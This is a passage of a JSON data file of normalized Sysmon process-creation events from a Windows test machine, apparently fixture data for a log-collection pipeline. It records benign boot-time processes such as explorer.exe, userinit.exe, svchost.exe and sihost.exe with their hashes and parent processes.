"c:\\windows\\system32\\svchost.exe", "subject.process.guid": "747f3d96-b76e-5ea4-0000-001034090600", "subject.process.id": "5632", "subject.process.name": "svchost.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": 
"2020-04-25T22:19:26.750Z", "type": "raw", "uuid": "7727892c-8c8c-4312-9de3-51783552efb2"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:35.2369214Z\"},\"EventRecordID\":\"27759\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:22.032\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b76a-5ea4-0000-0010eeb50300}\"},{\"Name\":\"ProcessId\",\"text\":\"4600\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\explorer.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1131 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Explorer\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft 
Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"EXPLORER.EXE\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\Explorer.EXE\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-00209bd30100}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d39b\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=421C8FE40D4A8B70547DCCD21D924B3C58C26F89,MD5=E883B381FDAD6E3125938DCB4EA798BB,SHA256=833500E09588EFA91056C81D86E5773173ADD278E0603E5C90315487117EEEBB,IMPHASH=6D78CE65118DF73A9E7BEAC9366C186A\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b769-5ea4-0000-00101d9c0300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4536\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\userinit.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\userinit.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b767-5ea4-0000-00209bd30100", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "119707", "object.process.cmdline": 
"C:\\Windows\\Explorer.EXE", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\explorer.exe", "object.process.guid": "747f3d96-b76a-5ea4-0000-0010eeb50300", "object.process.hash.imphash": "6D78CE65118DF73A9E7BEAC9366C186A", "object.process.hash.md5": "E883B381FDAD6E3125938DCB4EA798BB", "object.process.hash.sha1": "421C8FE40D4A8B70547DCCD21D924B3C58C26F89", "object.process.hash.sha256": "833500E09588EFA91056C81D86E5773173ADD278E0603E5C90315487117EEEBB", "object.process.id": "4600", "object.process.meta": "Description:Windows Explorer | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "explorer.exe", "object.process.original_name": "EXPLORER.EXE", "object.process.parent.cmdline": "C:\\Windows\\system32\\userinit.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\userinit.exe", "object.process.parent.guid": "747f3d96-b769-5ea4-0000-00101d9c0300", "object.process.parent.id": "4536", "object.process.parent.name": "userinit.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\", "object.process.version": "10.0.17763.1131 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "119707", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:22.032Z", "type": "raw", "uuid": "c66a5e6f-6e8e-4ddc-97df-4af84bcd138e"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:35.1257700Z\"},\"EventRecordID\":\"27753\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:21.838\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b769-5ea4-0000-00101d9c0300}\"},{\"Name\":\"ProcessId\",\"text\":\"4536\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\userinit.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Userinit Logon Application\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft 
Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"USERINIT.EXE\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\userinit.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-00209bd30100}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d39b\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=470C3E60F9B2B6D83F95C7916A5361E34DEC3471,MD5=BF8825D08BC235F0609CA8BBEF4E179C,SHA256=1FE7F7C59EC7EAA276739FA85F7DDA6136D81184E0AEB385B6AC9FEAAA8C4394,IMPHASH=8419D97ABDFEB6C320F0C39028647572\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-001096530000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"568\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\winlogon.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"winlogon.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b767-5ea4-0000-00209bd30100", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "119707", "object.process.cmdline": "C:\\Windows\\system32\\userinit.exe", 
"object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\userinit.exe", "object.process.guid": "747f3d96-b769-5ea4-0000-00101d9c0300", "object.process.hash.imphash": "8419D97ABDFEB6C320F0C39028647572", "object.process.hash.md5": "BF8825D08BC235F0609CA8BBEF4E179C", "object.process.hash.sha1": "470C3E60F9B2B6D83F95C7916A5361E34DEC3471", "object.process.hash.sha256": "1FE7F7C59EC7EAA276739FA85F7DDA6136D81184E0AEB385B6AC9FEAAA8C4394", "object.process.id": "4536", "object.process.meta": "Description:Userinit Logon Application | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "userinit.exe", "object.process.original_name": "USERINIT.EXE", "object.process.parent.cmdline": "winlogon.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\winlogon.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-001096530000", "object.process.parent.id": "568", "object.process.parent.name": "winlogon.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "119707", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:21.838Z", "type": "raw", "uuid": "10d009a7-3044-4c58-98a2-f5d80c8c3d52"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:32.3589958Z\"},\"EventRecordID\":\"27747\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:20.786\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b768-5ea4-0000-00106fae0200}\"},{\"Name\":\"ProcessId\",\"text\":\"4264\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p -s CDPSvc\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL 
SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k LocalService -p -s CDPSvc", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b768-5ea4-0000-00106fae0200", "object.process.hash.imphash": 
"247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "4264", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:20.786Z", "type": "raw", "uuid": "c7f8d8df-6700-4ba4-8d25-f0ce563d8c0c"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:32.0975707Z\"},\"EventRecordID\":\"27730\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:19.960\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-001097430200}\"},{\"Name\":\"ProcessId\",\"text\":\"3820\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup -s 
WpnUserService\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-00209bd30100}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d39b\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b767-5ea4-0000-00209bd30100", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "119707", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup -s WpnUserService", "object.process.cwd": "C:\\Windows\\system32\\", 
"object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b767-5ea4-0000-001097430200", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "3820", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "119707", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:19.960Z", "type": "raw", "uuid": "d5521104-6ee3-4639-b76e-4ff44f2d3417"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:32.0583315Z\"},\"EventRecordID\":\"27728\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:19.856\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-0010d0310200}\"},{\"Name\":\"ProcessId\",\"text\":\"3760\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup -s 
CDPUserSvc\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-00209bd30100}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d39b\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b767-5ea4-0000-00209bd30100", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "119707", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup -s CDPUserSvc", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": 
"c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b767-5ea4-0000-0010d0310200", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "3760", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "119707", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:19.856Z", "type": "raw", "uuid": "55a23627-856b-4485-901a-45e0ffb4f68a"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:32.0508694Z\"},\"EventRecordID\":\"27727\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:19.844\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-0010fe2e0200}\"},{\"Name\":\"ProcessId\",\"text\":\"3752\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\sihost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1075 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Shell Infrastructure Host\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft 
Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"sihost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"sihost.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-00209bd30100}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d39b\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A72247134CA39DA0B1F706F6B339DC912C0EE0D3,MD5=F6A576DCC3EA8F62B8818434B163D25B,SHA256=FDF2362A69C542996A8AC84B938DE62CA97AC209762171D2F8B6B543D3A966D0,IMPHASH=D79FA753A3003DE97EDFC038DF32C136\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-0010dcdf0000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"1240\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.e